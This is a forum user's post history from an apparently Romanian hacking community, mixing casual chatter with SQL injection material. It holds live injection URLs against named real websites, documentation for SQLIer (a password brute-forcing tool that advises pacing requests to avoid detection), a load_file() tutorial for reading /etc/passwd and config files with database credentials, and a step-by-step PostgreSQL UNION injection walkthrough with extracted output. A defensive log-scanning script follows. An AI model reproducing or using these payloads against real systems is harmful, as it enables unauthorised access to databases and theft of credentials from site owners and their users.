
denjacker

Active Members
  • Posts: 411
  • Joined
  • Last visited
  • Days Won: 7

Everything posted by denjacker

  1. Build the syntax step by step until you notice what exactly is being blocked.. although if you had paid a little attention, it was just specified somewhere around here.
  2. The challenge is to get some table_name+from+db.. but it's not that hard.
  3. denjacker

     bug bounty

     Congratulations, and onward to greater things. Well done.
  4. No, little brother...
     http://www.communityinclusion.org/staff.php?staff_id=129+group+by+156353535353543534
     error in query1: SELECT a.article_id AS article_idx, article_title, timestamp, article_blurb, article_year_pub, article_month_pub FROM article a, article_staff at WHERE at.article_id = a.article_id and at.staff_id = 129 group by 156353535353543534 ORDER BY rank, article_year_pub desc, article_month_pub desc limit 5.Unknown column '156353535353543534' in 'group statement'
  5. Let's discuss it here so the others understand too.
     http://www.communityinclusion.org/staff.php?staff_id=129+order+by+1--
     Let's look at the error more closely:
     error in query1: SELECT a.article_id AS article_idx, article_title, timestamp, article_blurb, article_year_pub, article_month_pub FROM article a, article_staff at WHERE at.article_id = a.article_id and at.staff_id = 129 order by 1-- ORDER BY rank, article_year_pub desc, article_month_pub desc limit 5.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY rank, article_year_pub desc, article_month_pub desc limit 5' at line 3
     From this you should deduce:
     1] the comment used to terminate the query is incomplete or ... useless.
     2] you can't use "order by 1 ORDER BY rank" --> because it will generate a syntax error.
     Try to compute the number of columns with GROUP BY and then come back to point 1]. In fact that is the essential problem for solving the challenge.
  6. Say where you got stuck so we know how to help you further.
  7. SQLIer takes an SQL Injection vulnerable URL and attempts to determine all the necessary information to build and exploit an SQL Injection hole by itself, requiring no user interaction at all (unless it can't guess the table/field names correctly). By doing so, SQLIer can build a UNION SELECT query designed to brute force passwords out of the database. This script also does not use quotes in the exploit to operate, meaning it will work for a wider range of sites.

     SQLIer v0.8.2b Documentation
     --------------------------------------------------------------------------------

     Table of Contents
     ---------------------
     Introduction
     I: Syntax
     I.a: Argument Descriptions
     I.b: Guessing Field Names
     II: General Usage
     --------------------------------------------------------------------------------

     Introduction
     ----------------
     SQLIer is a script that brute forces passwords through 'true/false' SQL Injection vulnerabilities. With 'true/false' SQL Injection vulnerabilities, you cannot actually query data out of the database, only ask a statement that is returned 'true' or 'false'. SQLIer takes each character's ASCII code and asks a 'higher/lower' question to the database, eventually reaching the actual character code. This script also does not use quotes in the exploit to operate, meaning it will work for a wider range of sites. An 8 character password (containing any character from decimal ASCII code 1-127) takes approximately 1 minute to crack.

     I. Syntax
     -------------
     sqlier [OPTIONS]

     I.a: Options
     ----------------
     -c [host]         Clear all exploit information stored for [host].
     -o [file]         Output cracked passwords to [file].
     -s [seconds]      Wait [seconds] between page requests.
     -u [usernames]    Usernames that will be brute forced from the database, comma separated (Username1,Username2,Username3).
     -w [options]      Pass [options] to wget.

     I.b: Guessing Field Names
     -----------------------------
     --table-names [table_names]    Comma separated list of table names to guess.
     --user-fields [user_fields]    Comma separated list of username fields to guess.
     --pass-fields [pass_fields]    Comma separated list of password fields to guess.

     II. General Usage
     ---------------------
     Given there is an SQL Injection vulnerability at: http://example.com/sqlihole.php?id=1
     Running "sqlier -s 10 http://example.com/sqlihole.php?id=1" will try to get enough information to exploit passwords out of the database, waiting 10 seconds in between each request.
     If the table, username field, and password field names have been guessed correctly, then the exploit is ready to brute force passwords out of the database by passing usernames to query, like so:
     sqlier -s 10 example.com -u BCable,administrator,root,user4
     However, in the instance that the built in field/table names do not guess the correct fields, you can pass guesses like so:
     sqlier -s 10 example.com --table-names [table_names] --user-fields [user_fields] --pass-fields [pass_fields]
     Until the correct table, username field, and password field names are known, SQLIer cannot brute force passwords from the database.
     Note: If "-s" is not passed, each request is done immediately after the last request. This can raise red flags, however.
     http://bcable.net/releases.php?sqlier
  8. Thanks a lot.. eBookVortex :: Signup ElbitZ.NET, Your Online Learning Center :: Login -> Registrations are currently closed. Next Aug 15th; those of you who are interested, stay tuned.
  9. begood'ica can i haz 1? Many thanks regardless of the reply!
  10. denjacker

     greetings

     Ehhhhh... what times those were, man, when Sketches was young and restless. Stealth, which one were you?
  11. denjacker

     greetings

     No!.. this is how it looked back in the day (2007): Hack MD - Moldovian Hacking & Security Team. I'm curious how many of you caught those times and are still more or less active?... apart from Andrei
  12. denjacker

     greetings

     Old people resurrected... he was definitely on hackmd! Hi and welcome.
  13. denjacker

     nytro_rst

     Is the photo from Balcescu or from Roaită? )))))
  14. http://conky.sourceforge.net/documentation.html tons of examples, scripts, tips & tricks for conky. My Conky Config (Page 1) - Tips, Tricks & Scripts - CrunchBang Linux Forums
  15. Hey, I've decided to write this little tutorial to let people understand how load_file() works, because it seems everyone here is scared of MySQL version 4.

     What is load_file()?
     Syntax: load_file('/blah/blah.php')
     It is a MySQL global function that reads and outputs the contents of a local file. It is the best way to hack sites that have MySQL version 4. This is just an example on a UNIX system with PHP files, but if you find such a vulnerability, you can do many things, like:
     - read .htpasswd files, read PHP files without execution.
     - bypass directory listing and htaccess
     - read unix files at /etc/, like /etc/passwd.
     And many many more... But not all sites are vulnerable to load_file()... So it is kind of a rare thing.

     First, when you have found a site vulnerable to SQLi, you should select the largest column possible (this can be a column that shows a lot of text). Here is our visible column:

     Second, to execute load_file() in the URL, you need to hex the path, because if we put load_file('/blah/blah.php') inside the URL, it will filter special symbols and load_file() will not work. For example /etc/passwd in hex is: 2f6574632f706173737764
     So you should execute it like that: php?id=1 union select load_file(0x2f6574632f706173737764)--
     (Notice: you should put "0x" before the hex to let MySQL understand that it's not normal input, but hex code)
     After you have executed it, it should output the /etc/passwd file, where you can find your target's directories. As you see, on this screenshot it shows us the directory for the site somesite.com: /home/webmaster/www/somesite.com
     If it doesn't show the path anywhere (even in a MySQL error message while SQL injecting, or somewhere else), you can guess it yourself. For example, if you SQLi the site "blah.net", then you can try /home/webmaster/www/blah.net, or /home/webmaster/public_html/blah.net, or /home/webmaster/http/blah etc..

     Third, once you have found the site path, scan the site with Acunetix/other software to find filenames on this site.
     For example, it could be index.php or sensitive directories, like /includes (it stores the non-encrypted username and password for MySQL users). In my example, I found the directory /includes. The target file for the MySQL username and password is usually config.php or config.inc.php or config.new.php. It depends what kind of software the site uses. If it uses WordPress or Joomla or vBulletin, phpBB or some other crap, it would be too easy to find the right path and name for this file (or any other files you want to dump).

     Last step: just hex the path to the file again, and execute:

     Hope this helps!
     ChuckNorrisLove
  16. Short Introduction For PostgreSQL. PostgreSQL, often simply Postgres, is an object-relational database management system (ORDBMS). It is released under an MIT-style license and is thus free and open source software. Version 7.x to 9.0 is latest.

     Note: before I proceed further I would like to tell my readers (beginners): injection does not mean that the back end DB is vulnerable; that is caused by the bad code of a web developer who does not validate the input.

     Step-1: Getting Started with Union Based: Every DB uses the same principle to pull data out of the DB; of course it is SELECT using appropriate column names. I'm not going to explain SELECT because everyone knows about it.

     Step-2: Checking Target For Vuln.
     http://www.crookedtree.org/index.php?catid=583'
     an error has occured with the database!SELECT * FROM bus_category WHERE id = 583\'
     Errors: MySQL with MYSQL, or MS SQL with SQL, or ORACLE with ORA, or MS ACCESS with Jet, and Warning: pg_exec () [function.pg-exec] <== PostgreSQL, or an error like the one above.

     Step-3: Getting Number Of Columns. For getting the columns we use the same method used in other DBs, ORDER BY; we use -- or # for comments.
     http://www.crookedtree.org/index.php?catid=583 order by 1-- <== no error
     http://www.crookedtree.org/index.php?catid=583 order by 2-- <== no error
     http://www.crookedtree.org/index.php?catid=583 order by 3-- <== no error
     http://www.crookedtree.org/index.php?catid=583 order by 4-- <== no error
     We will increment by 1 till we get an error, and we have an error on the 14th column. That means we have 13 columns (error_column_num - 1) = 13.
     Another method is executing the query with UNION and getting to the column count, i.e.
     http://www.crookedtree.org/index.php?catid=-583 union select null-- <== error
     http://www.crookedtree.org/index.php?catid=-583 union select null,null-- <== error
     http://www.crookedtree.org/index.php?catid=-583 union select null,null,null-- <== error
     We will keep adding null till we get a blank page or the site loaded. This method is really annoying.

     Step-4: Getting Data for the Visible Column. The term most people use is "vuln column". Same as in Oracle injection, we will use the null data type for the columns. Question is why????? Because we do not know the datatype, so using the null datatype will do the trick for us. And of course some sites do have integer values, so it will be used vice versa.
     http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null--
     Now we can see the page loaded without error (sometimes loaded but content missing, as on this site). Now what? We cannot see any column printed on screen. Let's proceed with the integer value 0.
     http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,null,null,null,null,null,null,null,null,null,null,null,null-- <== no error
     http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,0,null,null,null,null,null,null,null,null,null,null,null-- <== no error
     http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,0,0,null,null,null,null,null,null,null,null,null,null-- <== error
     http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,0,null,0,null,null,null,null,null,null,null,null,null-- <== error
     We will keep replacing null with the integer value "0" until we get an error. Wow, we have an error on the 3rd and 4th columns; there are other columns as well, but we stop here and move to the next step. This is what we are looking for.

     Step-5: Getting DB Version. Now our query will be the same as with null, except the 4th column; we will replace it with version().
     http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,version(),null,null,null,null,null,null,null,null,null--
     PostgreSQL 8.2.9 on x86_64-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 (Ubuntu 4.1.2-0ubuntu4)
     Now we have got the DB version.

     Step-6: Getting Other DBs and Table Schema. I'm going to check if this target has other DBs or not.
     http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,datname,null,null,null,null,null,null,null,null,null FROM pg_database--
     AAA <== db
     We only see one database at a time. Now what to do, hmmm, how about using LIMIT to get the others.
     http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,datname,null,null,null,null,null,null,null,null,null FROM pg_database LIMIT 1 OFFSET 1--
     LIMIT 1 OFFSET 1 <== OFFSET value. If we keep changing this value then we will get the next DB, like 1 2 3.... I will explain how to use other DBs for injection in another tutorial. Now we will move on to our injection.

     Step-6.1: Now Getting Table Schema.
     http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,table_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.TABLES--
     addbook
     Bad thing is we can't concat, hehehe, aah so what to do now. We will have to use LIMIT. I've already explained how to use it.
     http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,table_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.TABLES limit 1 offset 3--
     artist_entry
     OR Table From Current DB Schema
     http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,table_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.TABLES where table_schema=current_schema() limit 1 offset 0--
     addbook
     Just keep increasing the value and you will see the next table.

     Step-7: Getting Columns Of Schema. Now let's proceed with column enumeration.
     http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,column_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.columns
     abbrev
     Getting columns for the schema, again the same, one at a time; we will use LIMIT here.
     http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,column_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.columns limit 1 offset 1--
     access_date

     Step-7.1: Getting Columns for a Particular Table for the Current DB Schema
     http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,column_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.columns where table_name=addbook--
     What is wrong with this query??? Aah, an error. Remember in MySQL why we have to convert the table name into char; I'm not going to explain it here. But here the scenario is a little different: for concatenating char we will use the " || " pipe sign. We are using the table name "addbook". We will convert our table name with Oracle char, using the HackBar addon: select the table name and SQL--->ORACLE--->ORACLE CHAR().
     http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null, column_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.columns where table_name= CHR(97) || CHR(100) || CHR(100) || CHR(98) || CHR(111) || CHR(111) || CHR(107)--
     add1
     Again, to get the other columns we will have to use LIMIT.
     http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,column_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.columns where table_name= CHR(97) || CHR(100) || CHR(100) || CHR(98) || CHR(111) || CHR(111) || CHR(107) limit 1 offset 3--
     city

     Step-8: Getting Data From Column
     http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,city,null,null,null,null,null,null,null,null,null from addbook limit 1 offset 1--
     Alanson
     That's all folks. Hope you have enjoyed it. Post your valuable comments.

     Quick Cheat List:
     current_database()
     current_schema()
     current_user
     inet_client_addr()
     inet_client_port()
     inet_server_addr()
     inet_server_port()
     pg_my_temp_schema()
     pg_postmaster_start_time()
     session_user
     user
     version()
     getpgusername()
     Special Thanks to: N3T.CrAck3R, Sho0ter, Renorobert, NetSpy
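The request shapes quoted in the two tutorials and the challenge discussion above (ORDER BY / GROUP BY column-count probes, UNION SELECT null,... enumeration of INFORMATION_SCHEMA and pg_database, CHR()||CHR() concatenation, and hex-encoded load_file() paths) are all visible in an ordinary web server access log. The following is an added example, not code from any of the quoted posts or tools: a small Python detector that URL-decodes each query string, matches those patterns, and decodes 0x... literals so an analyst can see which file a load_file() request asked for. The log lines are constructed.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (not from the original posts), shaped like the
# requests quoted above; the first one is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2011:10:00:01] "GET /staff.php?staff_id=129 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Aug/2011:10:00:02] "GET /staff.php?staff_id=129+order+by+1-- HTTP/1.1" 200 812
10.0.0.5 - - [01/Aug/2011:10:00:03] "GET /staff.php?staff_id=129+group+by+156353535353543534 HTTP/1.1" 200 790
10.0.0.7 - - [01/Aug/2011:10:01:00] "GET /index.php?catid=-583%20UNION%20SELECT%20null,datname,null%20FROM%20pg_database-- HTTP/1.1" 200 3001
10.0.0.9 - - [01/Aug/2011:10:02:00] "GET /page.php?id=1%20union%20select%20load_file(0x2f6574632f706173737764)-- HTTP/1.1" 200 4096
"""

# Rule name -> pattern applied to the URL-decoded query string.
RULES = [
    ("column-count probe", re.compile(r"\b(order|group)\s+by\s+\d+", re.I)),
    ("union select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema enumeration", re.compile(r"\b(information_schema|pg_database|pg_catalog)\b", re.I)),
    ("chr() concatenation", re.compile(r"\bchr\(\d+\)\s*\|\|", re.I)),
    ("load_file", re.compile(r"\bload_file\s*\(", re.I)),
]
HEX_LITERAL = re.compile(r"0x([0-9a-f]+)", re.I)
REQUEST_TARGET = re.compile(r'"(?:GET|POST)\s+(\S+)')

def decode_query(target):
    """Return the query string of a request target with '+' and %XX decoded."""
    return unquote_plus(urlsplit(target).query)

def decode_hex_literals(text):
    """Decode MySQL-style 0x... literals (e.g. a load_file() path) to text."""
    decoded = []
    for m in HEX_LITERAL.finditer(text):
        try:
            decoded.append(bytes.fromhex(m.group(1)).decode("ascii"))
        except ValueError:  # odd length or non-ASCII bytes: not a readable path
            pass
    return decoded

def analyze_line(line):
    """Return (matched rule names, decoded hex literals) for one log line."""
    m = REQUEST_TARGET.search(line)
    if not m:
        return [], []
    query = decode_query(m.group(1))
    hits = [name for name, rx in RULES if rx.search(query)]
    return hits, (decode_hex_literals(query) if hits else [])

def scan_log(text):
    """Return (line number, rule names, decoded literals) for each flagged line."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        hits, literals = analyze_line(line)
        if hits:
            findings.append((n, hits, literals))
    return findings
```

Running scan_log(SAMPLE_LOG) flags lines 2 to 5 and decodes the load_file() argument on line 5 to /etc/passwd; the benign request on line 1 is not reported.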
  17. 3 in Google and 2 in Havij... well done master! Let's see you get all the way to root! Sometimes I get the impression I'm talking to myself..
  18. SQLite Manager - Firefox Add-ON : https://addons.mozilla.org/en-US/firefox/addon/sqlite-manager/
  19. Debatable. SQL Injection doesn't boil down to -1 union select 1,2,3/* ..done! There are cases where you can run into very complex filters, or you simply have to "make room" for yourself inside a hardcore heavy query. Even when it comes to MySQL the procedure can reach a very high level of complexity. More than once I've come across parameters for which I lost hours/days before managing to get the version in the output. Not to mention Oracle, PostgreSQL, Coldfusion, Interbase, Syngress, SQLite and so on. Agreed, as long as HAVIJ, SQLmap, Pangolin or the Helper work.. sql injections everybody knows, and it's the easiest. As for FMI I don't know what it's about, I'm not interested, so I'm not getting involved. Alekum Salam
  20. It has been discussed before: it was, it no longer is, but it will be..